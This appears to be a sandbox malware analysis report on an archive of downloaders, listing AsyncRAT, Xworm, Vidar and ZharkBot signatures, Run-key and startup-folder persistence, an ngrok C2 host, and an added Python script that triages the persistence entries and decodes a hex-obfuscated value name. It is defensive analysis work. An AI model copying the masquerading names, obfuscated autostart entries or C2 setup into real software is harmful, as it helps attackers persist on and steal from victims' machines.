Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Zharkbot family
Detect Vidar Stealer
Asyncrat family
Detect Xworm Payload
Detects ZharkBot payload
Vidar
Vidar family
Xworm family
Xworm
AsyncRat
ZharkBot
Async RAT payload
Boot or Logon Autostart Execution: Active Setup
Downloads MZ/PE file
Uses browser remote debugging
Modifies Windows Firewall
Sets service image path in registry
Reads data files stored by FTP clients
Drops startup file
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Enumerates connected drives
Installs/modifies Browser Helper Object
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Boot or Logon Autostart Execution: Authentication Package
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
Program crash
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Detects Pyinstaller
System Network Configuration Discovery: Internet Connection Discovery
Uses Volume Shadow Copy service COM API
System policy modification
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-02-14 01:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-14 01:10
Reported
2025-02-14 01:54
Platform
win11-20250210-en
Max time kernel
1800s
Max time network
1800s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
ZharkBot
Zharkbot family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1003530991-2962315046-3000157291-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" | C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" | C:\Users\Admin\AppData\Local\Temp\Files\Update.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1003530991-2962315046-3000157291-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .." | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .." | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1003530991-2962315046-3000157291-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
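Two things in this table deserve a closer look than the signature name gives them. The value name `53$79$73$74$65$6d$33$32` is the ASCII hex of `System32` with `$` separators, so the same entry exists under two spellings, and every target points into `C:\Users\Admin` (Roaming, Documents, Templates), which is where a user-level dropper can write; the HKLM entries were written by `Update.exe` from `AppData\Roaming`, which only succeeds because the sandbox ran the sample elevated. By contrast, the Active Setup, Browser Helper Object, Internet Explorer and policy rows elsewhere in this analysis all name the Microsoft Edge installer `setup.exe` as the writing process and describe the Edge IEToEdge components, so they are installer activity during the 1800 s run rather than behaviour of the dropped files. The script below is an added example, not part of the sandbox output: it parses rows copied from this table and from "Drops startup file", decodes the hex-encoded value name, and flags autostart targets under `C:\Users`. The row list and the "anything under C:\Users is user-writable" rule are constructed simplifications for the example.

```python
"""Persistence triage for the 'Adds Run key' and 'Drops startup file' rows above.

Added example, not sandbox output. Parses the pipe-separated signature rows,
decodes the '$'-separated hex value name the sample used for one Run entry,
and flags autostart targets that live under C:\\Users (user-writable).
"""
import re
from dataclasses import dataclass

# Rows copied from the report tables and embedded so the example runs offline.
ROWS = [
    r'| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" | C:\Users\Admin\AppData\Local\Temp\Files\Update.exe | N/A |',
    r'| Set value (str) | \REGISTRY\USER\S-1-5-21-1003530991-2962315046-3000157291-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" | C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe | N/A |',
    r'| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .." | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |',
    r'| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |',
    r'| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |',
]

# Indicator shape for a Run value: <key>\Run\<name> = "<escaped value>"
RUN_RE = re.compile(r'^(?P<key>\\REGISTRY\\.*\\Run)\\(?P<name>[^\\=]+?)\s*=\s*"(?P<raw>.*)"$')
EXE_RE = re.compile(r'[A-Za-z]:\\[^"]*?\.exe', re.IGNORECASE)
HEX_NAME_RE = re.compile(r'^(?:[0-9A-Fa-f]{2}\$)+[0-9A-Fa-f]{2}$')
STARTUP_DIR = '\\start menu\\programs\\startup\\'


@dataclass
class Finding:
    kind: str          # 'run_key' or 'startup_file'
    hive: str          # HKLM, HKU (per-user SID) or n/a for files
    name: str          # value name (decoded) or dropped file name
    raw_name: str      # value name exactly as written to the registry
    target: str        # executable that will run at logon
    writer: str        # process that created the entry
    user_writable: bool


def decode_name(name: str) -> str:
    """'53$79$73$74$65$6d$33$32' -> 'System32'; anything else is returned unchanged."""
    if HEX_NAME_RE.match(name):
        return bytes.fromhex(name.replace('$', '')).decode('ascii', 'replace')
    return name


def unescape(raw: str) -> str:
    """Undo the report's backslash escaping inside the quoted value string."""
    return re.sub(r'\\(.)', r'\1', raw)


def hive_of(key: str) -> str:
    if key.startswith('\\REGISTRY\\MACHINE\\'):
        return 'HKLM'
    if key.startswith('\\REGISTRY\\USER\\'):
        return 'HKU'
    return '?'


def user_writable(path: str) -> bool:
    # Simplification for the example: anything under C:\Users is treated as
    # writable by the logged-on user; Program Files and Windows are not.
    return path.lower().startswith('c:\\users\\')


def triage(rows):
    """Turn signature rows into Finding records; rows that are not autostart entries are skipped."""
    findings = []
    for line in rows:
        cells = [c.strip() for c in line.strip().strip('|').split('|')]
        if len(cells) != 4:
            continue
        _desc, indicator, writer, _target = cells
        m = RUN_RE.match(indicator)
        if m:
            value = unescape(m['raw'])
            exe = EXE_RE.search(value)
            target = exe.group(0) if exe else value
            findings.append(Finding('run_key', hive_of(m['key']), decode_name(m['name']),
                                    m['name'], target, writer, user_writable(target)))
        elif STARTUP_DIR in indicator.lower():
            fname = indicator.rsplit('\\', 1)[-1]
            findings.append(Finding('startup_file', 'n/a', fname, fname, indicator,
                                    writer, user_writable(indicator)))
    return findings


if __name__ == '__main__':
    for f in triage(ROWS):
        flag = 'USER-WRITABLE' if f.user_writable else 'system'
        print(f'{f.kind:13} {f.hive:4} {f.name:14} -> {f.target}  [{flag}] written by {f.writer}')
```

On a live host the same logic applies to the output of `reg query` or `Get-ItemProperty` over both Run keys; the hex-encoded value name would otherwise slip past a check that only looks for literal names.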
Checks installed software on the system
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 6.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\stub.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\stub.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Update.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{9FBEF9FD-3EF3-45A8-B7AF-B90084764E6F}\EDGEMITMP_7AFC1.tmp\setup.exe | N/A |
